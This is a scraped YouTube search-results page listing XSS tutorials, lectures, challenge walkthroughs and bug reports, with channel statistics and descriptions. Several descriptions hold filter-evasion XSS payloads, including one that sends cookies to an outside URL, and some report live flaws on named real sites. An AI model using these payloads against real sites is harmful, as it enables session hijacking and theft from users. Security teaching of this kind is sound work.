About 20 results out of 1739 (0.23 seconds)
Basic XSS Guide #1 -  Alert() - Redirection - Cookie Stealing

Channel Title : JackkTutorials

Views : 65676

Likes : 713

DisLikes : 39

Published Date : 2016-04-05T23:00:00.000Z

Visit https://bugcrowd.com/jackktutorials to get started in your security research career! G2A Re-link: https://www.g2a.com/?reflink=jackk1337 In this tutorial jackktutorials shows you how to get started with XSS Cross Site Scripting in BWAPP including Alert(), Webpage redirection and Cookie Stealing. LINKS AND RESOURCES ************************* Cookie Stealing Tutorial - https://youtu.be/Nv6CPs_j7hc XSS Definition - https://en.wikipedia.org/wiki/Cross-site_scripting Cookie Stealer Source - https://www.jackktutorials.com/?page_id=21 WAMP Server - http://www.wampserver.com/en/ GET MORE JACKKTUTORIALS! ******************************** Website: http://www.jackktutorials.com Forums: http://www.jackktutorials.com/forums Facebook: http://www.facebook.com/jackktutorials Twitter: http://www.twitter.com/jackk1337 Email: [email protected] Business Contact: [email protected] G2A Re-link: https://www.g2a.com/?reflink=jackk1337
Cracking Websites with Cross Site Scripting - Computerphile

Channel Title : Computerphile

Views : 978886

Likes : 20365

DisLikes : 397

Published Date : 2013-10-23T13:56:48.000Z

Audible free book: http://www.audible.com/computerphile JavaScript is dangerous! Why? How are websites vulnerable to it? Find out about bug-bounties from Tom Scott. More from Tom Scott: http://www.youtube.com/user/enyay and https://twitter.com/tomscott http://www.facebook.com/computerphile https://twitter.com/computer_phile This video was filmed and edited by Sean Riley. Computerphile is a sister project to Brady Haran's Numberphile. See the full list of Brady's video projects at: http://bit.ly/bradychannels

Channel Title : ali hayali

Views : 21

Likes : 0

DisLikes : 0

Published Date : 2017-11-06T13:21:21.000Z

Hiding JavaScript in Picture Files for XSS

Channel Title : Don Does 30 Official

Views : 12973

Likes : 305

DisLikes : 17

Published Date : 2017-10-12T20:11:04.000Z

How to hide JavaScript in GIF, BMP, WEBP, PNM, or PGF files for the purposes of cross-site scripting. The site is required to receive the file without stripping metadata, and needs to be vulnerable to XSS to run the script (future tutorial). Git: https://github.com/jklmnn/imagejs
Steal sensitive information & credentials with XSS

Channel Title : Shawar Khan

Views : 3417

Likes : 44

DisLikes : 4

Published Date : 2016-05-05T18:21:21.000Z

Disclaimer: This video is only for educational purposes. I am not responsible for any damage done using this technique. A technique used for stealing sensitive information and credentials of a user using XSS vulnerability. View full article on http://shawarkhan.com

Channel Title : Rekcah Nexus

Views : 157

Likes : 1

DisLikes : 0

Published Date : 2013-03-26T04:20:33.000Z


Channel Title : kof2002

Views : 214

Likes : 1

DisLikes : 0

Published Date : 2014-03-27T23:56:01.000Z

t" onmouseover=prompt(document.domain);a=t

Channel Title : Alexander Yang

Views : 203

Likes : 0

DisLikes : 0

Published Date : 2011-12-14T21:01:51.000Z

http://shafigullin.pro/share.html?' http://shafigullin.pro/share.html?" http://shafigullin.pro/share.html?#'
Security(Section access, Section Application) and Hidden Script - QlikView Tutorial - Session 17

Channel Title : Trending Courses

Views : 138

Likes : 2

DisLikes : 0

Published Date : 2018-12-06T13:04:59.000Z

In this session you will learn about Security(Section access, Section Application) and Hidden Script Security ------------ Document Level ------------------------ Section Access Server Level ----------------- Qlikview Publisher Section Access --------------------- Section Access; Load * ..................; Section Application; ACCESS,USERID,PASSWORD,NTUSER,NTDOMAIN,SERIAL,OMIT Section Access; Load * Inline [ ACCESS,USERID,PASSWORD,LINK ADMIN,admin,admin,* USER,user1,user1,US USER,user2,user2,UK USER,user3,user3,FR USER,user1,user1,UK USER,user4,user4 ] Section Application; Sales: Load * Inline [ LINK, Country, Sales US, USA, 1000 UK, United Kingdom, 800 FR, France, 750 DE, Germany, 940 ];
Persistent XSS Header Injection on GEPI

Channel Title : !m0Nk3y_

Views : 401

Likes : 7

DisLikes : 0

Published Date : 2013-11-20T17:41:01.000Z

Product : Gepi Tested Version : 1.5.1 Vendor Notification : October 10, 2013 Vendor Patch : October 14, 2013 Public Disclosure : November 20, 2013 Vulnerability Type : Persistent Cross-Site Scripting Risk Level : High Discovered by : Yvann Le Fay; !m0Nk3y_ PoC : When you are on the login page, type the id of your victim for example : lefay_p type any password and launch Tamper Data |firefox module or other like|, tamper the header parameter and set User-Agent to $script$alert|'String'|$/script$, send the request, when the user will go to his history of connections, the javascript will be executed on his browser. Solution : Update to Gepi 1.6.2 More Information: http://gepi.mutualibre.org/fr/download I was 13 :p, the same year I got the root access to ac-versailles with my friend Gauthier in two different ways (social engineering, spip vulnerability, & https://bugzilla.redhat.com/show_bug.cgi?id=962792), I reported it.

Channel Title : HACK THE PLANET

Views : 74

Likes : 0

DisLikes : 0

Published Date : 2017-04-21T14:27:51.000Z

How to Attack on cross site scripting vulnerable websites (XSS)

Channel Title : A Team

Views : 838

Likes : 5

DisLikes : 5

Published Date : 2018-08-20T18:39:08.000Z

How to Attack on cross site scripting vulnerable site (XSS) Hey guys! Rogue Flame from A Team here back again with another video, in this video, we will be looking at how to attack Vulnerable cross-site script XSS website using google dork. cross site scripting vulnerable website find cross site scripting vulnerable website (XSS) How to Attack on cross site scripting vulnerable website (XSS) XSS vulnerable attack XSS vulnerable sites 2018.XSS vulnerable website I Hope you enjoy/enjoyed the video. If you have any questions or suggestions feel free to ask them in the comments section Thanks for watching! social media Facebook https://www.facebook.com/ateamadmin Благодаря за гледането 感谢您观看 Merci d'avoir regardé Grazie per la visione Gracias por ver شكرا للمشاهدة देखने के लिए धन्यवाद
"><img src=x onerror=alert(document.domain)>

Channel Title : charlie'z yoski\

Views : 1057

Likes : 0

DisLikes : 0

Published Date : 2015-02-08T23:14:12.000Z

"><img src=x onerror=alert(document.domain)>
XSS (cross site scripting ) filter evasion series stage 8

Channel Title : Vishwaraj Bhattrai

Views : 1051

Likes : 3

DisLikes : 0

Published Date : 2015-02-02T06:19:14.000Z

payload used : javascript:alert(document.domain); challenge link : http:--xss-quiz.int21h.jp-stage008.php
Cross Site Scripting (XSS)-3 (XSS stored IFRAME and COOKIE Exploit)

Channel Title : Hacking Monks

Views : 4502

Likes : 35

DisLikes : 4

Published Date : 2017-01-11T16:22:36.000Z

Hello guys. We are the hacking monks. Here is our blog – http://www.hackingmonks.net/p/home.html Here is our Facebook Page - https://www.facebook.com/Hacking-Monks-1589849474562976/?ref=settings
Cross-site Scripting (XSS)

Channel Title : Z. Cliffe Schreuders

Views : 175

Likes : 4

DisLikes : 0

Published Date : 2018-06-09T09:58:59.000Z

This video is part of the computer/information/cyber security and ethical hacking lecture series; by Z. Cliffe Schreuders at Leeds Beckett University. Laboratory work sheets, slides, and other open educational resources are available at http://z.cliffe.schreuders.org. The slides themselves are creative commons licensed CC-BY-SA, and images used are licensed as individually attributed. Topics covered in this lecture include: Code injection Client-side scripts are injected into a vulnerable website The script gets “served up” to victims (other users of the website) The script can misbehave! This can have severe security consequences Guess How many XSS disclosed via CVE since last month? https://nvd.nist.gov/vuln/search/results?adv_search=true&form_type=advanced&results_type=overview&cwe_id=CWE-79&mod_date_start_month=0&mod_date_start_year=2018 XSS is the most prevalent security vulnerability XSS is the most prevalent type of Web security vulnerability Reported and exploited since the 90s Surpassed buffer overflows (CVE database stats: https://cwe.mitre.org/documents/vuln-trends/index.html) Malicious content The website gets malicious content mixed in with the original website The attacker’s script gains access to: Page content Cookies, session information Anything the page contains or does These can be altered or sent to the attacker by the script Malicious content Can result in session hijacking! Account take over Disclosure of sensitive/personal data Performing actions on behalf of victims Modification of web content via content spoofing Redirecting to other websites Showing ads Potentially for all users on the site! Example: Twitter https://www.youtube.com/watch?v=zv0kZKC6GAM Same-origin policy Origin: URI scheme, host name, and port number Scripts on pages from the same origin get access to data/DOM/cookies Without same-origin policy any website could take control of any other site Imagine Internet banking without those protections There are tightly controlled ways web pages/tabs can relax these protections, to share data or pass messages Cross-document messaging Non-persistent, AKA reflected XSS, AKA Type-II XSS The malicious script sent to the server by the web client For example in the URL If the server echos input into the HTML (without sanitisation) then code injection may be possible Usually sent by the attacker to the victim via email, IM, website, etc Innocent looking URLs, pointing to the trusted server When the victim opens the link, results in the malicious script running in the victim’s browser Nothing is actually stored on the server (other than logs) Persistent, AKA stored XSS, AKA Type-I XSS When the server stores input that is later echoed to (other) users without proper validation/sanitisation Malicious scripts can be sent to the server, which will be stored (in a database), and then fed to victims Stored XSS can affect all the users of a website Server-side vs DOM-based (client side) Traditionally XSS relays the script via a web server When more logic is run on the client (for example, with modern web apps), XSS can also be directed against client logic For example, JQuery plugins have been vulnerable to this Facebook $3,500 USD Bug Bounty YouTube Stored XSS in comments Testing for XSS Try as input: Audit the source code and look for where the input makes its way back to HTML, and check it is validated and sanitised Un-sanitised input and command injection All data that comes from an untrusted source must be validated and sanitised before use What is an untrusted source?: pretty much everything external to the software (URL, user input, etc) Validation: check it is in the format you expect Sanitisation: remove any potentially dangerous formatting / content Sanitising input Validation at server or client Must happen on the server Should also happen on the client if there is logic in the client Prevention Web sites should use safe encoding methods to ensure that the input data is not interpreted as code For example, Convert these characters: Escape all input using appropriate safe libraries Prevention When input is poorly sanitised, clever attacks are still possible For example, without recursive sanitisation, one parse might end up with a malicious string There are multiple methods for injecting JS, not just via script tags Prevention https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules_Summary
XSS Cross Site Scripting Demonstration

Channel Title : Imperva

Views : 185997

Likes : 434

DisLikes : 32

Published Date : 2009-07-02T03:17:49.000Z

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. That purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example it could copy user cookies and then send those cookies to the attacker. The Script Injection video should be watched before this video for greater understanding.
From XSS to Domain Admin - Demo

Channel Title : eLearnSecurity

Views : 950

Likes : 4

DisLikes : 0

Published Date : 2015-07-05T14:41:42.000Z

http://ow.ly/PcdcK A demonstration of a real world network penetration test. The network has up-to-date client and server operating systems, a DMZ between two firewalls and a company website. IT Security Researcher, Davide "GiRa" Girardi, tries to gain full access to an Active Directory Administrator Account. Watch the full pentest for FREE here: http://ow.ly/PcdcK
Copy of xss'-confirm(document.domain)-'

Channel Title : Deepak tqwe

Views : 13

Likes : 0

DisLikes : 1

Published Date : 2017-03-01T17:54:54.000Z

Cross-Site Scripting Explained - Part 7: HTML Events

Channel Title : webpwnized

Views : 4989

Likes : 16

DisLikes : 0

Published Date : 2012-01-29T16:45:52.000Z

Author: Jeremy Druin Twitter: @webpwnized Description: This video demonstrates injecting cross site scripts into HTML events. The example requires a prefix to close off an existing JavaScript statement in the onclick event targetted. Any script injected into the HTML event will be executed when the user clicks the BACK button on the page. Mutillidae is a free web application which is vulnerable on purpose to give a training envoronment for pen testers, security enthusiasts, universities, and as a target for evaluating vulnerability assessment tools. Updates about Mutillidae are announced on Twitter at @webpwnized. Mutillidae can be downloaded from irongeek.com Thank you for watching. Please support this channel. Up vote, subscribe or even donate by clicking "Support" at https://www.youtube.com/user/webpwnized! The webpwnized YouTube channel is dedicated to information security, security testing and ethical hacking. There is an emphasis on web application security but many other topics are covers. Some of these include forensics, network security, security testing tools and security testing processes. The channel provides videos to encourage software developers and system administrators to perform security testing. Also, the channel educates the next generation of security testers and bug bounty hunters who want to respectfully, legally and ethically help system owners that allow security testing.
How to Redirect Stored XSS

Channel Title : Dragunman White Hat

Views : 560

Likes : 1

DisLikes : 0

Published Date : 2015-11-14T15:31:22.000Z

How Redirect Stored XSS What is Stored XSS Stored Xss attacks involve an attacker injecting a script referred to as the payload that is Permanently Stored Persisted on the target application for instance within a database.The classic Example of stored Xss is a malicious script inserted by an attacker in a comment field on a blog or in a forum post. Detail Of Stored Xss Cross Site Scripting Xss attacks are an instantiate of injection problems in which malicious scripts are injected into the otherwise benign and trusted web sites.Cross Site Scripting XSS vulnerabilities occur when 1 Data enters a Web application through an UN trusted source most frequently a web request. 2 The data is included in dynamic content that is sent to a web user without being validated for malicious code.The malicious content sent to the web browser often takes the form of a segment of JavaScript but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on Xss is almost limitless but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the users machine under the guise of the vulnerable site. Confidentiality: The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Access control: In some circumstances it may be possible to run arbitrary code on a victim's computer when cross site scripting is combined with other flaws Exposure Period Implementation: If bulletin-board style functionality is present, cross-site scripting may only be deterred at implementation time. More Information For open This Link http://www.dragunman.com/how-redirect-stored-cross-site-scripting-xss Just For Education Prupose.
XSS on Google Search - Sanitizing HTML in The Client?

Channel Title : LiveOverflow

Views : 315345

Likes : 9501

DisLikes : 136

Published Date : 2019-03-31T11:57:21.000Z

An actual XSS on google.com by Masato Kinugawa. It abuses a parsing differential between a JavaScript enabled and disabled context. The fix: https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa -=[ ❤️ Support ]=- → per Video: https://www.patreon.com/join/liveoverflow → per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join -=[ 🔴 Stuff I use ]=- → Microphone:* https://amzn.to/2LW6ldx → Graphics tablet:* https://amzn.to/2C8djYj → Camera#1 for streaming:* https://amzn.to/2SJ66VM → Lens for streaming:* https://amzn.to/2CdG31I → Connect Camera#1 to PC:* https://amzn.to/2VDRhWj → Camera#2 for electronics:* https://amzn.to/2LWxehv → Lens for macro shots:* https://amzn.to/2C5tXrw → Keyboard:* https://amzn.to/2LZgCFD → Headphones:* https://amzn.to/2M2KhxW -=[ 🐕 Social ]=- → Twitter: https://twitter.com/LiveOverflow/ → Website: https://liveoverflow.com/ → Subreddit: https://www.reddit.com/r/LiveOverflow/ → Facebook: https://www.facebook.com/LiveOverflow/ -=[ 📄 P.S. ]=- All links with "*" are affiliate links. LiveOverflow / Security Flag GmbH is part of the Amazon Affiliate Partner Programm.
Exploiting a Cross-site Scripting (XSS) vulnerability on Facebook

Channel Title : acunetix

Views : 41620

Likes : 75

DisLikes : 19

Published Date : 2010-07-27T09:53:44.000Z

The following video shows how an attacker may exploit a cross-site scripting vulnerability on Facebook.com regardless of the HTTPOnly cookie protection used. Of course, this goes way beyond showing an "alert()" popup in Javascript, since the attacker is also able to hijack the victim's Facebook account. We also published an article to explain in more technical detail the works behind abusing such a flaw. http://www.acunetix.com/websitesecurity/xss-facebook.htm Facebook rates as the second most popular website on the internet with 400 million active users. When such a website has common web application security flaws, they are going to be abused for one's gain. When we came across an obvious cross-site scripting vulnerability, we decided to show that an attacker could do that. We worked with Facebook to make sure that this vulnerability is fixed. We would like to thank their security team for quickly fixing it. For more information visit http://www.acunetix.com
Cross-Site Scripting(XSS) using image file upload

Channel Title : Shawar Khan

Views : 14813

Likes : 69

DisLikes : 36

Published Date : 2015-07-21T04:39:38.000Z

In this video i will tell you about executing cross-site scripting(XSS) attack using a file upload.This method can be used with other file types like bmp png and other types. Site: Shawarkhan.com Facebook: www.facebook.com/shawarkhanskofficial
XSS (cross site scripting ) filter evasion series stage 6

Channel Title : Vishwaraj Bhattrai

Views : 1167

Likes : 6

DisLikes : 0

Published Date : 2015-02-01T10:52:56.000Z

xss vector used is onmouseover="prompt(document.domain);"" Link for the challenge 6 http:-- xss-quiz.int21h.jp-stage-no6.php
XSS (cross site scripting ) filter evasion series stage 7

Channel Title : Vishwaraj Bhattrai

Views : 751

Likes : 6

DisLikes : 0

Published Date : 2015-02-02T06:02:12.000Z

Payload used : a onmouseover=prompt(document.domain); challenge link : s-quiz.int21h.jp-stage07.php
video127 script alert('test1');/script http://example.com/  #cool

Channel Title : socialisten Area 51

Views : 145

Likes : 3

DisLikes : 2

Published Date : 2015-05-04T09:33:52.000Z

© scriptalert('cookie!');/script or are you strongbold/strong or let's see "what & we can ﶾ or cannot @bananorama do +test   - 00a0 link. äöü bo/b #tag next "l' H&M scriptalert('c');/script ' ' http://socialisten.at/ MENTION tab ends 00a0
XSS show document.cookie on disneyshop.com

Channel Title : Dhiemas Adi Pradana

Views : 32

Likes : 4

DisLikes : 0

Published Date : 2019-04-10T12:14:22.000Z

Show cookie data with XSS payload on disneyshop.com. This is reflected XSS made a medium impact for the site. Subscribe for more videos contact : [email protected]
Step by Step HTTP Cookie Tutorial

Channel Title : Hussein Nasser

Views : 482

Likes : 31

DisLikes : 0

Published Date : 2019-05-02T02:57:11.000Z

💻 More Software engineering videos https://www.youtube.com/playlist?list=PLQnljOFTspQXOkIpdwjsMlVqkIffdqZ2K HTTP Cookies are small pieces of data that are used as storage medium in the browser and are also sent to the server with each request. Cookies are mainly used for session management, user personalization, and tracking. In this video we will try to demystify cookies and learn everything there is to them by example and with demos as well! Creating Cookies 1. Document.cookie (client side) 2. set-cookie header (server side) Cookies Properties Sent with each request Cookies are automatically sent to the server with each request. so becareful not to stuff your app with cookies because it might slow down as network bandwidth become saturated with bloated requests.. Per Domain They are stored per domain think of them as cookie buckets, for instance you visit google.com you will get a specific cookie for google.com, any cookies created while in google.com will go to the google.com bucket and so on. there are exceptions but this the general rule. by default if you create cookie, it will only be accessable within the domain, it will only be sent to the same domain. You can create a cookie with the domain property which will also include subdomains. example, domain=husseinnasser.com , includes blog.husseinnasser.com, about.husseinnasser.com etc.. Example.com www.example.com Path specific cookies cookies for a given path only. /r1 /r2 routes make only cookie for r1 and cookie for r2 client will only send cookies for that path. if you know you are going to use the cookies in certain paths why waste precious bandwidth sending it with every path? Cookies Types 1. Session cookie - no expires or max-age, once browser close they are “deleted” browsers are being smart and keep them though 2. permanent cookie - set max-age 3. httponly cookie cannot be accessed with document.cookie 4. secure cookie only acceptable with https 5. Third party cookie - page references another page, gets its own cookies.. 6. Zombie Cookies - recreted even after users delete them, e-tags from the server Cookie Security 1. Stealing cookies, inject XSS script, 2. cross site request forgery, more dangerous and easier, I don’t want your cookie I just want to make a request on your behave using your cookie and make myself an advtange as a result.. since you are signed in to your bank I will inject a script that makes a request ot YOUR bank to transfer myself money.. samesite Stay Awesome! Hussein
Hacking 101 - Cross site scripting - web security tutorial

Channel Title : GhostBit

Views : 210

Likes : 6

DisLikes : 0

Published Date : 2019-03-16T09:24:30.000Z

Hello World! Welcome to my channel. In this video, I am Going to show you what is Cross site scripting? And how to use it. What is Cross site scripting? Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. There are 3 types of XSS, I'm going to talk about the 2 most used: ►Reflected XSS Attack: When an attacker inject his malicious script into a search query, a search box, or the end of an URL, it's called Reflected XSS Attack. It's like throwing a ball against a wall and receive him back. ►Stored XSS Attack: Is when an injected XSS script is stored permanently on a website, for example in a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the site with the malicious code. How to Protect Yourself: The primary defenses against XSS are described in the OWASP XSS Prevention Cheat Sheet. Also, it's crucial that you turn off HTTP TRACE support on all web servers. An attacker can steal cookie data via Javascript even when document.cookie is disabled or not supported by the client. This attack is mounted when a user posts a malicious script to a forum so when another user clicks the link, an asynchronous HTTP Trace call is triggered which collects the user's cookie information from the server, and then sends it over to another malicious server that collects the cookie information so the attacker can mount a session hijack attack. This is easily mitigated by removing support for HTTP TRACE on all web servers. Thanks for watching my video hit like Button, Subscribe to this channel and press bell icon for more videos. ►"Install bwapp in xampp": https://youtu.be/N95oGV4QNro subscribe": https://goo.gl/9kbN6d ►"Free Ethical Hacking Course": https://goo.gl/oVMSpf ►"Hacking 101- Find Sub-Domain- web security tutorial":https://youtu.be/vLFoFi7RJ3c ►"Domain Information Gathering": https://youtu.be/SL3nufBODUY ►"Convert Any File Or Folder Into ISO File.":https://youtu.be/8F-YLnrwjxA ►"how to hack windows 10." https://www.youtube.com/watch?v=T8mtHFA2wPI ►"How to use phishing attacks for Facebook." https://www.youtube.com/watch?v=TaWKeS7yzBg ►"how to change IP address and location." https://www.youtube.com/watch?v=-yzgPrs1oms ~-~~-~~~-~~-~- ~-~~-~~~-~~-~- Tobu - Colors [NCS Release] https://youtu.be/MEJCwccKWG0 http://www.youtube.com/tobuofficial Music promoted by Audio Library https://youtu.be/PQC7VaL7xlc -~-~~-~~~-~~-~-
window location in JavaScript

Channel Title : kudvenkat

Views : 36211

Likes : 121

DisLikes : 3

Published Date : 2015-02-24T20:22:35.000Z

Link for all dot net and sql server video tutorial playlists http://www.youtube.com/user/kudvenkat/playlists Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2015/02/windowlocation-in-javascript.html In this video we will discuss the use of Location object. The Window.location property returns a Location object that can be used to get information about the current page. Window.location property can also be used to redirect the browser to a new page. In Part 73 of JavaScript tutorial we discussed how to detect if JavaScript is enabled by using [noscript] element. Another way is by using window.location property. Let us use the example we worked with in Part 73. We will use window.location property along with [noscript] element to detect if JavaScript is enabled. Add a new HTML page to your project. Name it Default.htm. Copy and paste the following HTML and JavaScript. [html] [head] [script] // If JavaScript is enabled this code redirects the user to HTMLPag1.htm // If JavaScript is disable this code will not execute and the user reamains on this // page and he gets to the see the message that JavaScript is disabled. window.location = "/HTMLPage1.htm"; [/script] [/head] [body] [h1]It seems that you have disabled JavaScript. Please enable JavaScript.[/h1] [/body] [/html] We don't need to make any modification to HTMLPage1.htm. At this point If you have JavaScript enabled, and if you visit Default.htm page, you will be redirected to HTMLPage1.htm If you have JavaScript disabled, and if you visit Default.htm page, you will reamin on Default.htm page and you will get to see the message that says JavaScript is disabled. window.location property is especially useful if you have 2 sites 1. One for users with JavaScript 2. Another for users without JavaScript Make the home-page of Non-JavaScript website the default page. In the default page include the following JavaScript code to redirect the user to the JavaScript-EnabledSite.com window.location = "http://www.JavaScript-EnabledSite.com"; If you have JavaScript enabled, you will be redirected to JavaScript enabled website. If you have JavaScript disabled, you will not be redirected and stay with the website which works without JavaScript. Some of the useful properties of the location object window.location.href - Returns the URL of the current page window.location.hostname - Returns the domain name window.location.protocol - Returns the protocol (http or https) window.location.pathname - Returns the path of the current page [script type="text/javascript"] document.write("window.location.href = " + window.location.href + "[br/]"); document.write("window.location.hostname = " + window.location.hostname + "[br/]"); document.write("window.location.pathname = " + window.location.pathname + "[br/]"); document.write("window.location.protocol = " + window.location.protocol + "[br/]"); [/script] Output : window.location.href = http://localhost:57695/Default.htm window.location.hostname = localhost window.location.pathname = /Default.htm window.location.protocol = http:
Unpatched Facebook (investor.fb.com) User-Agent Cross Site Scripting Vulnerability

Channel Title : Xowia Vulnerability Lab

Views : 438

Likes : 0

DisLikes : 0

Published Date : 2015-05-05T06:05:06.000Z

Here is the user-agent cross site scripting vulnerability in investor.fb.com that is still unpatched. Our security researchers reported it to Facebook but according to them this is not a security bug. And we asked for make a public disclosure, in return they don't have any issue.
A Tutorial On XSS Attack (Cross Site Scripting)

Channel Title : Mushahid Ali

Views : 1978

Likes : 14

DisLikes : 2

Published Date : 2016-09-05T12:45:59.000Z

Sup, Guys. This Is Mushahid Ali Doing A TUTORIAL On XSS Attack. Hope You Guys Liked It. Also Please Rate, Like, Comment, Share And Subscribe To Get The Latest Videos On Hacks , Comedy And Stuff. Here Are Some Of The XSS Code's : scriptalert1'XXSED By Mushahid Ali!'1/script code onclick="alert1'XXSED By Mushahid Ali'1"CLICK HERE TO GET YOURSELF HACKED !/code script document.location="www.google.com"document.cookie /script " script alert1"XSSED-By-Mushahid Ali"1 /script " script alert1/XSSED-By-Mushahid Ali/1 /script SCRIPT alert1"XSSED-By-Mushahid Ali"1;// /SCRIPT %253cscript%253ealert1/XSSED-By-Mushahid Ali/1%253c/script%253e foo script alert1/XSSED-By-Mushahid Ali/1 /script scr script ipt alert1/XSSED-By-Mushahid Ali/1 /scr /script ipt Most Importantly, I Smile A Lot And Want To Make You Feel Happy. Subscribe! My FaceBook : https://www.facebook.com/mushahid.ali.777 My Facebook Page : https://www.facebook.com/MushahidAliOfficialPage/ Follow Me @ Twitter : https://www.twitter.com/alimushahid24/ My Official Website : https://officialpage-f880e.firebaseapp.com/ The Background Theme Used In The Video Is Different Heaven & EH!DE - My Heart [NCS Release]. Here's The A Link To It : https://www.youtube.com/watch?v=jK2aIUmmdP4 Thanks For Watching And Don't Forget To Keep Smiling =D !
stored xss bypassed ||onmouseover

Channel Title : Being Anonymous-Sandip

Views : 65

Likes : 2

DisLikes : 1

Published Date : 2018-06-10T06:13:10.000Z

victim site: https://bit.ly/2sYFIvw Many bugs are found on this site.short demo .checkout
JavaScript Executor in Selenium WebDriver

Channel Title : Specialize Automation

Views : 3785

Likes : 25

DisLikes : 9

Published Date : 2017-10-29T10:58:57.000Z

Learn how to use javascript in selenium and top 10 javascript functions in Selenium Webdriver. Using Javascript we can directly interact with the HTML dom to work on webpage. JavaScript in selenium Webdriver, How to navigate URL using Javascript, How to fetch webElement using Javascript, How to refresh page using Javascript, How to get innertext of a page using Javascript, How to click on a webelement using Javascript, How to open a link in same tab using Javascript, How to Scroll in selenium Webdriver using Javascript, How to scroll to a element in selenium using Javascript, How to do vertical scroll in selenium using Javascript, How to highlight webElement in selenium using Javascript, How to find total frames in selenium using Javascript, String script = "window.location = \'"+url+"\'"; JavascriptExecutor js =(JavascriptExecutor)driver; js.executeScript(script) js.executeScript("history.go(0)"); String sText =js.executeScript("return document.title;").toString(); WebElement search =(WebElement) js.executeScript("return document.getElementById('searchBtn');"); String frames = js.executeScript("document.frames.length;").toString(); js.executeScript("arguments[0].scrollIntoView(true);", element); js.executeScript("window.scrollBy(300,2000)"); js.executeScript("arguments[0].setAttribute('style', arguments[1]);", ele, "background:" + "yellow; color: Red; border: 4px dotted solid yellow;"); js.executeScript("arguments[0].click();",element); js.executeScript("arguments[0].setAttribute('target','_self');",element); // to open in same tab js.executeScript("alert('Enter your Facebook crednetials');"); js.executeScript("confirm('Enter your Facebook crednetials');"); js.executeScript("prompt('Enter your crednetials',’Enter domain’);") Linkedin: https://www.linkedin.com/in/aditya-kumar-roy-b3673368/ Facebook: https://www.facebook.com/SpecializeAutomation/
XSS in sandbox domains GOOGLE

Channel Title : MMMAAA OOOUUU

Views : 232

Likes : 1

DisLikes : 0

Published Date : 2015-07-16T06:27:23.000Z

Google uses a range of sandbox domains to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data. For this reason, we recommend using alert(document.domain) instead of alert(1) as your default XSS payload. In particular, if you see script execution in any subdomains of the domains in this list: ad.doubleclick.net googleusercontent.com googlecode.com codespot.com feeds.feedburner.com googleadservices.com googledrive.com googlegroups.com {your-blog-name}.blogspot.com {your-app-name}.appspot.com

Channel Title : Abk Khan

Views : 112

Likes : 0

DisLikes : 0

Published Date : 2015-02-09T18:43:31.000Z

"><img src=x onerror=prompt(document.domain);>
Calling live json web service using jquery ajax

Channel Title : kudvenkat

Views : 64760

Likes : 336

DisLikes : 9

Published Date : 2015-06-17T20:20:07.000Z

Link for all dot net and sql server video tutorial playlists https://www.youtube.com/user/kudvenkat/playlists?sort=dd&view=1 Link for slides, code samples and text version of the video http://csharp-video-tutorials.blogspot.com/2015/06/calling-live-json-web-service-using.html In this video we will discuss how to call a live weather web service that returns JSON data using jquery ajax. For the purpose of this demo, we will be using the live weather web service that returns JSON data. The web service can be found at the following URL. http://openweathermap.org/current We want to retrieve weather data from the web service and display it on a web page. Here is the HTML and jQuery code used in the demo <html> <head> <script src="jquery-1.11.2.js"></script> <script type="text/javascript"> $(document).ready(function () { $('#btnGetWeather').click(function () { var resultElement = $('#resultDiv'); resultElement.html(''); var requestData = $('#txtCity').val() + ',' + $('#txtCountry').val(); $.ajax({ url: 'http://api.openweathermap.org/data/2.5/weather', method: 'get', data: { q: requestData }, dataType: 'json', success: function (response) { if (response.message != null) { resultElement.html(response.message); } else { resultElement.html('Weather: ' + response.weather[0].main + '<br/>' + 'Description: ' + response.weather[0].description); } }, error: function (err) { alert(err); } }); }); }); </script> </head> <body style="font-family:Arial"> <table> <tr> <td>City</td> <td><input type="text" id="txtCity" /></td> </tr> <tr> <td>Country</td> <td><input type="text" id="txtCountry" /></td> </tr> </table> <input type="button" id="btnGetWeather" value="Get Weather Data"> <br /><br /> <div id="resultDiv"> </div> </body> </html>

Channel Title : Alyssa Herrera

Views : 148

Likes : 15

DisLikes : 0

Published Date : 2016-07-01T19:13:09.000Z

No commentary Over watch Competitive. Pre-tournament training and climbing to 70. ► Current Rank http://masteroverwatch.com/profile/shared/0a2fd3d5b21b21ac ► TWITCH https://www.twitch.tv/alyssa_gryphon -~-~~-~~~-~~-~- Please watch: "[No Commentary] Competive Overwatch Vod #2" https://www.youtube.com/watch?v=Pf0HxBOylcI -~-~~-~~~-~~-~-
XSS (Cross Site Scripting) Stealing a cookie Kitabisa.com

Channel Title : Richie Daniel

Views : 281

Likes : 0

DisLikes : 0

Published Date : 2018-11-29T06:40:08.000Z

Ellusionist HTML Injection + Persistent XSS

Channel Title : Spade

Views : 51

Likes : 1

DisLikes : 0

Published Date : 2017-03-04T06:15:30.000Z

Selenium with C# 51 - IJavaScriptExecutor interface | How to execute JavaScript from Selenium

Channel Title : Ankpro Training

Views : 475

Likes : 9

DisLikes : 0

Published Date : 2018-12-07T03:00:01.000Z

